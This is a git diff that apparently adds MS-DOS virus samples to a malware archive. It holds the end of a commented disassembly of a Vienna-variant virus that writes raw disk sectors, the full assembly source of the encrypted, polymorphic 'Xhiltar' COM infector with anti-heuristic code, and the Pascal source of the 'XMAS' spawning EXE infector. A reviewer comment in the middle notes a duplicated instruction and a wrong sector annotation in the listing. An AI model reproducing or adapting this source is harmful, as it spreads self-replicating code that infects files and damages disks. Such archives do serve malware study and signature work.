21 +04B8 E9F5FC jmp 01B0 ; find next + +;---------------------------------------- +; move 11 bytes do DS:DI ('C:\COMMAND.') + +04BB BE6205 mov si,0562 +04BE B90B00 mov cx,000B +04C1 FC cld +04C2 F3A6 
rep cmpsb +04C4 C3 ret + +; buffer for path + +04C5 30 31 32 33 34 35 36 37 01234567 +04CD 38 39 30 31 32 33 34 35 89012345 +04D5 36 37 38 39 30 31 32 33 67890123 +04DD 34 35 36 37 38 39 30 31 45678901 +04E5 32 33 34 35 36 37 38 39 23456789 +04ED 30 31 32 33 34 35 36 37 01234567 +04F5 38 39 30 31 32 33 34 35 89012345 +04FD 36 37 38 43 3A 5C 4A 45 678C:\JE +0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P +050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ + +; paterns for search + +0515 2A 2E 43 4F 4D 00 50 41 *.COM PA +051D 54 48 3D TH= + +; buffers for file names + +0520 49 42 4D 42 49 IBMBI +0525 4F 2E 43 4F 4D 00 O.COM + +052B 49 42 IB +052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM +0535 00 + +; local DTA + +0536 03 3F 3F 3F 3F 3F 3F ;\ +053D 3F 3F 43 4F 4D FF 02 00 ; | reserved +0545 00 00 00 00 00 00 ;/ +054B 20 ; file attribute +054C 00 60 71 0E ; file time stamp +0550 DB 62 00 00 ; file size +0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) + +0561 01 ; flag: attributes are changed + +0562 43 3A 5C C:\ +0565 43 4F 4D 4D 41 4E 44 2E COMMAND. +056D 43 4F 4D 00 00 4D 00 00 COM M +0575 00 2E 43 4F 4D 00 4F 68 .COM Oh +057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo +059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh +05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +05BD 68 4E 6F 21 hNo! 
+ +05C1 65 05 ; + +;--------------------------------------- +; write character (or space) cx times + +05C3 B020 mov al,20 + +05C5 50 push ax +05C6 E89E00 call 0667 ; write character +05C9 58 pop ax +05CA E2F9 loop 05C5 +05CC C3 ret + +;------------- +; next line + +05CD B00D mov al,0D +05CF E89500 call 0667 ; write character +05D2 B00A mov al,0A +05D4 E99000 jmp 0667 ; write character + +;------------------------------ +; drow christmast tree +; +; result will look like this: +; +; +; +; *** +; ***** +; ******* +; ********* +; *********** +; ************* +; *************** +; ***************** +; ******************* +; ********************* +; *********************** +; ************************* +; *************************** +; ***************************** +; +; +; +; +; Und er lebt doch noch : Der Tannenbaum ! +; Frohe Weihnachten ... +; + +05D7 B92700 mov cx,0027 +05DA E8E6FF call 05C3 ; clear 39 characters +05DD B0AD mov al,AD ; '' +05DF E88500 call 0667 ; write character +05E2 E8E8FF call 05CD ; new line +05E5 BB0300 mov bx,0003 +05E8 BA2600 mov dx,0026 + +05EB 8BCA mov cx,dx +05ED E8D3FF call 05C3 ; write CX spaces +05F0 8BCB mov cx,bx +05F2 B02A mov al,2A ; '*' +05F4 E8CEFF call 05C5 ; write CX characters +05F7 E8D3FF call 05CD ; new line +05FA 4A dec dx +05FB 83C302 add bx,0002 +05FE 83FB1F cmp bx,001F +0601 75E8 jne 05EB + +0603 BB0300 mov bx,0003 +0606 B92600 mov cx,0026 +0609 E8B7FF call 05C3 ; write CX spaces +060C B90300 mov cx,0003 +060F B0DB mov al,DB ; '' +0611 E8B1FF call 05C5 ; write CX characters +0614 E8B6FF call 05CD ; next line +0617 4B dec bx +0618 75EC jne 0606 + +061A B95000 mov cx,0050 ; full line +061D B0CD mov al,CD ; '' +061F E8A3FF call 05C5 ; write character CX times +0622 B91300 mov cx,0013 +0625 E89BFF call 05C3 ; write CX spaces +0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... 
+062B E82C00 call 065A ; write string +062E B91D00 mov cx,001D +0631 E88FFF call 05C3 ; clear part of line +0634 EB24 jmp 065A ; write asciiz string pointed by BX +0636 90 nop + +0637 E80000 call 063A + +063A 5B pop bx +063B 83C30D add bx,000D +063E 8CC8 mov ax,cs +0640 8ED8 mov ds,ax +0642 E81500 call 065A ; write string +0645 EBFE jmp 0645 ; hang CPU + +0647 41 70 72 69 6C 2C 20 41 April, A +064F 70 72 69 6C 20 2E 2E 2E pril ... +0657 20 07 00 + +;----------------------------------- +; write asciiz string pointed by BX + +065A 8A07 mov al,[bx] ; get character +065C 43 inc bx ; next character +065D 0AC0 or al,al ; and of string? +065F 7405 je 0666 ; yes, RET + +0661 E80300 call 0667 ; write character +0664 EBF4 jmp 065A ; get next character +0666 C3 ret + +;-------------------- +; write character TTL + +0667 52 push dx +0668 51 push cx +0669 53 push bx +066A 32FF xor bh,bh +066C B40E mov ah,0E +066E CD10 int 10 +0670 5B pop bx +0671 59 pop cx +0671 59 pop cx +0672 5A pop dx +0673 C3 ret + +0674 55 6E 64 20 65 72 20 6C Und er l +067C 65 62 74 20 64 6F 63 68 ebt doch +0684 20 6E 6F 63 68 20 3A 20 noch : +068C 44 65 72 20 54 61 6E 6E Der Tann +0694 65 6E 62 61 75 6D 20 21 enbaum ! +069C 0D 0A 00 46 72 6F 68 65 Frohe +06A4 20 57 65 69 68 6E 61 63 Weihnac +06AC 68 74 65 6E 20 2E 2E 2E hten ... 
+06B4 0D 0A 07 00 + +;------------------------------------------ +; write one sector to disk specified in DL +; track 9, side 0 sector 1 + +06B8 32F6 xor dh,dh +06BA B90100 mov cx,0001 +06BD BB3706 mov bx,0637 +06C0 B80103 mov ax,0301 +06C3 CD13 int 13 +06C5 C3 ret + +;================== +; INT 24h handler + +06C6 B000 mov al,00 +06C8 CF iret + +; table of bytes for changing encrypt routine + +06C9 5E 00 0F 43 +06CD 5E 30 0F 43 +06D1 5E D2 07 43 +06D5 76 00 0C 46 +06D9 76 30 0C 46 +06DD 76 D2 04 46 +06E1 7E 00 0D 47 +06E5 7E 30 0D 47 +06E9 7E D2 05 47 + +; table for variants of decrypt routine + +06ED 28 30 D2 + +; part of victime code + +06F0 F3A4 rep movsb +06F2 8BF1 mov si,cx +06F4 8BF9 mov di,cx +06F6 C3 ret + +06F7 0307 ; offset of buffer/modified code +06F9 DB63 ; file size + 256 +06FB C603 ; +06FD 0306 ; +06FF 0060 ; file date +0701 710E ; file time + diff --git a/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm b/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm new file mode 100644 index 00000000..ab4f1162 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xhiltar.asm 
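Review bot: The listing of the character-output routine at 0667 prints `0671 59 pop cx` twice, although 0670–0673 are consecutive one-byte instructions and the routine pushes dx, cx, bx only once, so the second line is a transcription duplicate that should be dropped rather than a real extra pop. The header comment of the sector-write routine at 06B8 reads `; track 9, side 0 sector 1`, while the code loads `mov cx,0001`, i.e. track 0, sector 1 (consistent with the `track 0 sector 1 (partition table)` note at 0221), so the comment should read `; track 0, side 0, sector 1`. The same two slips appear in the preceding hunk (MSDOS/Virus.MSDOS.Unknown.v-oneate.asm), whose visible tail looks byte-for-byte identical to this listing even though its header describes a different Vienna variant — worth confirming that file was not assembled from the wrong source. For an analysis listing an accurate opcode stream and sector annotation matter, since detection signatures and disk-damage triage are derived from them.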
@@ -0,0 +1,151 @@
+; The Xhiltar Virus
+; By Arsonic[Codebreakers]
+; Type: Runtime Appending Com Infector
+; Encrypted: Yes
+; Polymorphic: Yes
+; Time/Date: Yes
+; add Attrib: Yes
+; Changes Directory's: Yes (dotdot method)
+; Anti-Anti-Virus: Yes (anti-heuristics)
+db 0e9h,0,0
+start:
+call delta
+delta:
+pop bp
+sub bp,offset delta
+mov cx,0ffffh ;fuck up those heristics!
+fprot_loopy:
+jmp back
+mov ax,4c00h
+int 21h
+back:
+loop fprot_loopy
+lea si,[bp+hidden_start]
+mov di,si
+mov cx,end - hidden_start
+call encryption
+jmp hidden_start
+value db 0
+encryption: ;encryption routine
+call poly
+encrypt:
+lodsb ;1
+_1stDummy:
+nop ;1 = +1
+xor al,byte ptr[bp+value] ;4
+_2ndDummy:
+nop ;1 = +6
+stosb ;1
+_3rdDummy:
+nop ;1 = +8
+loop encrypt ;2
+_4thDummy:
+nop ;1 = +11
+ret
+hidden_start:
+mov cx,3
+mov di,100h ;restore the first 3 bytes
+lea si,[bp+buff]
+rep movsb
+find_first: ;find first file
+mov ah,4eh
+find_next:
+lea dx,[bp+filemask]
+xor cx,cx ;with 0 attrib's..
+int 21h
+jnc infect
+close:
+push 100h
+ret
+infect:
+mov ax,3d02h ;open file
+mov dx,9eh
+int 21h
+xchg bx,ax
+mov ax,5700h ;get time/date
+int 21h
+push dx ;save the values
+push cx
+in al,40h ;get new encrypt value from system clock
+mov byte ptr [bp+value],al
+mov ah,3fh ;read 3 bytes from the file.. too
+mov cx,3 ;be replaced with a jump to the virus
+lea dx,[bp+buff]
+int 21h
+mov ax,word ptr [80h + 1ah] ;check for infect
+sub ax,end - start + 3
+cmp ax,word ptr[bp+buff+1]
+je close_file
+mov ax,word ptr[80h + 1ah]
+sub ax,3
+mov word ptr[bp+three+1],ax
+mov ax,4200h ;goto start of file
+xor cx,cx
+xor dx,dx
+int 21h
+mov ah,40h ;write the 3 byte jump
+lea dx,[bp+three]
+mov cx,3
+int 21h
+mov ax,4202h ;goto end of file
+xor cx,cx
+xor dx,dx
+int 21h
+mov ah,40h ;write the unencrypted area
+lea dx,[bp+start]
+mov cx,hidden_start - start
+int 21h
+lea si,[bp+hidden_start] ;encrypt the virus
+lea di,[bp+end]
+mov cx,end - hidden_start
+call encryption
+mov ah,40h ;write encrypted area
+lea dx,[bp+end]
+mov cx,end - hidden_start
+int 21h
+close_file:
+mov ax,5701h ;restore time/date
+pop cx ;with saved values
+pop dx
+int 21h
+mov ah,3eh ;close file
+int 21h
+mov ah,4Fh ;find next file
+jmp find_next
+poly:
+call random ;get random value
+mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt
+call random
+mov [bp+_2ndDummy],dl
+call random
+mov [bp+_3rdDummy],dl
+call random
+mov [bp+_4thDummy],dl
+ret
+garbage:
+nop ; no operation instruction
+clc ; Clear Carry
+stc ; Set Carry
+sti ; Set Interuppt Flag
+cld ; Clear Direction Flag
+cbw ; Convert byte to word
+inc dx ; increase dx
+dec dx ; decrease dx
+lahf ; loads AH with flags
+random:
+in ax,40h
+and ax,7
+xchg bx,ax
+add bx,offset garbage
+add bx,bp
+mov dl,[bx]
+ret
+filemask db '*.com',0
+three db 0e9h,0,0
+buff db 0cdh,20h,0
+dotdot db '..',0
+author db 'Arsonic[Codebreakers]',13,10,'$'
+virus db 'the XHiLTAR virus',13,10,'$'
+ db 'I LOVE U LISA',13,10,'$'
+ db 'I LOVE U SOOOO MUCH!',13,10,'$'
+end:
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.xmas.pas b/MSDOS/Virus.MSDOS.Unknown.xmas.pas
new file mode 100644
index 00000000..d6a134a6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.xmas.pas
@@ -0,0 +1,179 @@
+{
+
+ XMAS Virus, a non-resident spawning .EXE infector by Glenn Benton
+ To be compiled with Turbo Assembler 6.0
+
+ Files required : XMAS.PAS - Viral part (this one)
+ XMAS.OBJ - Music data (composed by myself!)
+ PLAYIT.TPU - Music player engine
+
+ Set the environment variables for different effects :
+
+ SET XMAS=YES (Disable virus)
+ SET XMAS=TST (Plays the music only)
+ SET XMAS=DEL (Deletes the virus when a program is started)
+
+ The compiled virus example is compressed and uses 6888 bytes...
+
+ On 25th and 26th the virus activates, playing the music and
+ wishes you a merry X-mas (nice of me, isn't it?)
+
+
+}
+
+Program Xmas;
+
+{$M 4096,0,512}
+
+Uses Crt, Dos, Playit;
+
+Label StartOrig;
+
+Var
+ Year, Month, Day, DayOfWeek : Word;
+ DirInfo : SearchRec;
+ ComSeek : SearchRec;
+ FileFound : Boolean;
+ FileName : String;
+ Parameters : String;
+ OrigName : String;
+ P : Byte;
+ ExtHere : Boolean;
+ Teller : Word;
+ StopChar : Char;
+ FromF : File;
+
+{Dit is de data van het te spelen liedje}
+{$L XMAS.OBJ}
+Procedure Christmas; EXTERNAL;
+
+{Deze routine wordt aangeroepen als het 25 of 26 december is}
+Procedure Active;
+Begin;
+StopChar := #0;
+ClrScr;
+GotoXY(32,5);
+WriteLn('Merry Christmas');
+GotoXY(38,7);
+WriteLn('and');
+GotoXY(31,9);
+WriteLn('A Happy New Year!');
+GotoXy(31,11);
+WriteLn('Wished To You By:');
+GotoXy(34,17);
+WriteLn('Glenn Benton');
+GotoXy(27,24);
+WriteLn('Press any key to continue');
+Repeat
+ PlayOBJ(@Christmas, TRUE, StopChar);
+Until StopChar<>#0;
+End;
+
+{Deze procedure zoekt een EXE file waarvan er geen COM is en stuurt het
+ resultaat in de boolean FileFound en de naam van het te maken COM bestand
+ in FileName}
+Procedure FileSeek;
+
+Label Seeker, FileSeekOk;
+Begin;
+FileFound:=False;
+FindFirst('*.EXE',Anyfile,DirInfo);
+
+Seeker:
+If DosError=18 Then Exit;
+FileName:= DirInfo.Name;
+Delete(FileName,Length(FileName)-2,3);
+Insert('COM',FileName,Length(FileName)+1);
+FindFirst(FileName,AnyFile,ComSeek);
+If DosError=18 Then Goto FileSeekOk;
+FindNext(DirInfo);
+Goto Seeker;
+
+FileSeekOk:
+FileFound:=True;
+End;
+
+Procedure CopyFile;
+var
+ FromF, ToF: file;
+ NumRead, NumWritten: Word;
+ buf: array[1..512] of Char;
+begin;
+ { Open input file }
+ Assign(FromF, ParamStr(0));
+ { Record size = 1 }
+ Reset(FromF, 1);
+ { Open output file }
+ Assign(ToF, FileName);
+ { Record size = 1 }
+ Rewrite(ToF, 1);
+ repeat
+ BlockRead(FromF,buf,
+ SizeOf(buf),NumRead);
+ BlockWrite(ToF,buf,NumRead,NumWritten);
+ until (NumRead = 0) or
+ (NumWritten <> NumRead);
+ Close(FromF);
+ Close(ToF);
+ Assign(ToF,FileName);
+ SetFAttr(ToF,Hidden);
+end;
+
+
+Begin; {Hoofdprocedure}
+If (GetEnv('XMAS')='DEL') or (GetEnv('XMAS')='del') Then
+ Begin;
+ OrigName:=ParamStr(0);
+ ExtHere:=False;
+ P:=Pos('.COM',OrigName);
+ If P<>0 Then ExtHere:=True;
+ P:=Pos('.com',OrigName);
+ If P<>0 Then ExtHere:=True;
+ If ExtHere=False Then
+ OrigName:=OrigName+'.COM';
+ Assign(FromF, OrigName);
+ SetFAttr(FromF,Archive);
+ Erase(FromF);
+ Goto StartOrig;
+ End;
+If (GetEnv('XMAS')='TST') or (GetEnv('XMAS')='tst') Then
+ Begin;
+ Active;
+ Goto StartOrig;
+ End;
+
+If (GetEnv('XMAS')='YES') or (GetEnv('XMAS')='yes') Then Goto StartOrig;
+
+{Datum bekijken of het 25 of 26 december is en indien juist Active aanroepen}
+GetDate(Year, Month, Day, DayOfWeek);
+If (Month=12) and ((Day=25) or (Day=26)) then Active;
+
+{Procedure voor EXE file zoeken aanroepen}
+FileSeek;
+
+{Als er een kandidaat is gevonden, dit prg als COM erbij zetten}
+If FileFound=False Then Goto StartOrig;
+CopyFile;
+
+StartOrig:
+Parameters:='';
+For Teller:= 1 to ParamCount Do Parameters:=Parameters+' '+ParamStr(Teller);
+OrigName:=ParamStr(0);
+ExtHere:=False;
+P:=Pos('.COM',OrigName);
+If P<>0 Then ExtHere:=True;
+P:=Pos('.com',OrigName);
+If P<>0 Then ExtHere:=True;
+If ExtHere=False Then
+ OrigName:=OrigName+'.EXE';
+If ExtHere=True Then
+ Begin;
+ Delete(OrigName,Length(OrigName)-3,4);
+ OrigName:=OrigName+'.EXE';
+ End;
+SwapVectors;
+Exec(OrigName,Parameters);
+SwapVectors;
+Halt(DosExitCode);
+End.
+